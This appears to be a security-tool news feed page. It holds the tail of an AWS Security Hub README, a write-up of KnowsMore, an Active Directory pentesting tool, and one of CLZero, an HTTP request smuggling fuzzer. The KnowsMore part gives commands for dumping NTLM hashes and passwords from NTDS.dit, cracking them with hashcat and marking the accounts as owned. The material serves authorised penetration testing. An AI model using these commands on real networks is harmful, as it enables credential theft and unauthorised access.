"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

Your findings are combined under the ARN of the resource affected, ending in only one result or one non-compliant resource.

You can now work in MetaHub with all these four findings together as if they were only one. For example, you can update these four Workflow Status findings using only one command: See Updating Workflow Status

Contributing

You can follow this guide if you want to contribute to the Context module guide.



KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)

By: Zion3R


KnowsMore officially supports Python 3.8+.

Main features

  • Import NTLM Hashes from .ntds output txt file (generated by CrackMapExec or secretsdump.py)
  • Import NTLM Hashes from NTDS.dit and SYSTEM
  • Import Cracked NTLM hashes from hashcat output file
  • Import BloodHound ZIP or JSON file
  • BloodHound importer (import JSON to Neo4J without BloodHound UI)
  • Analyse the quality of password (length , lower case, upper case, digit, special and latin)
  • Analyse similarity of password with company and user name
  • Search for users, passwords and hashes
  • Export all cracked credentials direct to BloodHound Neo4j Database as 'owned object'
  • Other amazing features...

Getting stats

knowsmore --stats

This command will produce several statistics about the passwords like the output bellow

weak passwords by company name similarity +-------+--------------+---------+----------------------+-------+ | top | password | score | company_similarity | qty | |-------+--------------+---------+----------------------+-------| | 1 | company123 | 7024 | 80 | 1111 | | 2 | Company123 | 5209 | 80 | 824 | | 3 | company | 3674 | 100 | 553 | | 4 | Company@10 | 2080 | 80 | 329 | | 5 | company10 | 1722 | 86 | 268 | | 6 | Company@2022 | 1242 | 71 | 202 | | 7 | Company@2024 | 1015 | 71 | 165 | | 8 | Company2022 | 978 | 75 | 157 | | 9 | Company10 | 745 | 86 | 116 | | 10 | Company21 | 707 | 86 | 110 | +-------+--------------+---------+----------------------+-------+ " dir="auto">
KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore

[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db

[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+

[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+

[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+

Installation

Simple

pip3 install --upgrade knowsmore

Note: If you face problem with dependency version Check the Virtual ENV file

Execution Flow

There is no an obligation order to import data, but to get better correlation data we suggest the following execution flow:

  1. Create database file
  2. Import BloodHound files
    1. Domains
    2. GPOs
    3. OUs
    4. Groups
    5. Computers
    6. Users
  3. Import NTDS file
  4. Import cracked hashes

Create database file

All data are stored in a SQLite Database

knowsmore --create-db

Importing BloodHound files

We can import all full BloodHound files into KnowsMore, correlate data, and sync it to Neo4J BloodHound Database. So you can use only KnowsMore to import JSON files directly into Neo4j database instead of use extremely slow BloodHound User Interface

# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip

# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json

Note: The KnowsMore is capable to import BloodHound ZIP File and JSON files, but we recommend to use ZIP file, because the KnowsMore will automatically order the files to better data correlation.

Sync data to Neo4j BloodHound database

# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678

Note: The KnowsMore implementation of bloodhount-importer was inpired from Fox-It BloodHound Import implementation. We implemented several changes to save all data in KnowsMore SQLite database and after that do an incremental sync to Neo4J database. With this strategy we have several benefits such as at least 10x faster them original BloodHound User interface.

Importing NTDS file

Option 1

Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry

knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM

Option 2

Note: First use the secretsdump to extract ntds hashes with the command bellow

secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name

After that import

knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds

Generating a custom wordlist

knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name

Importing cracked hashes

Cracking hashes

First extract all hashes to a txt file

# Extract NTLM hashes to file
nowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"

# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt

In order to crack the hashes, I usually use hashcat with the command bellow

# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"

# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a

importing hashcat output file

knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt

Note: Change clientCompanyName to name of your company

Wipe sensitive data

As the passwords and his hashes are extremely sensitive data, there is a module to replace the clear text passwords and respective hashes.

Note: This command will keep all generated statistics and imported user data.

knowsmore --wipe

BloodHound Mark as owned

One User

During the assessment you can find (in a several ways) users password, so you can add this to the Knowsmore database

knowsmore --user-pass --username administrator --password Sec4US@2023

# or adding the company name

knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us

Integrate all credentials cracked to Neo4j Bloodhound database

knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456

To remote connection make sure that Neo4j database server is accepting remote connection. Change the line bellow at the config file /etc/neo4j/neo4j.conf and restart the service.

server.bolt.listen_address=0.0.0.0:7687


CLZero - A Project For Fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors

By: Zion3R


A project for fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors.

About

Thank you to @albinowax, @defparam and @d3d else this tool would not exist. Inspired by the tool Smuggler all attack gadgets adapted from Smuggler and https://portswigger.net/research/how-to-turn-security-research-into-profit

For more info see: https://moopinger.github.io/blog/fuzzing/clzero/tools/request/smuggling/2023/11/15/Fuzzing-With-CLZero.html


Usage

usage: clzero.py [-h] [-url URL] [-file FILE] [-index INDEX] [-verbose] [-no-color] [-resume] [-skipread] [-quiet] [-lb] [-config CONFIG] [-method METHOD]

CLZero by Moopinger

optional arguments:
-h, --help show this help message and exit
-url URL (-u), Single target URL.
-file FILE (-f), Files containing multiple targets.
-index INDEX (-i), Index start point when using a file list. Default is first line.
-verbose (-v), Enable verbose output.
-no-color Disable colors in HTTP Status
-resume Resume scan from last index place.
-skipread Skip the read response on smuggle requests, recommended. This will save a lot of time between requests. Ideal for targets with standard HTTP traffic.
-quiet (-q), Disable output. Only successful payloads will be written to ./payloads/
-lb Last byte sync method for least request latency. Due to th e nature of the request, it cannot guarantee that the smuggle request will be processed first. Ideal for targets with a high
amount of traffic, and you do not mind sending multiple requests.
-config CONFIG (-c) Config file to load, see ./configs/ to create custom payloads
-method METHOD (-m) Method to use when sending the smuggle request. Default: POST

single target attack:

  • python3 clzero.py -u https://www.target.com/ -c configs/default.py -skipread

  • python3 clzero.py -u https://www.target.com/ -c configs/default.py -lb

Multi target attack:

  • python3 clzero.py -l urls.txt -c configs/default.py -skipread

  • python3 clzero.py -l urls.txt -c configs/default.py -lb

Install

git clone https://github.com/Moopinger/CLZero.git
cd CLZero
pip3 install -r requirements.txt


❌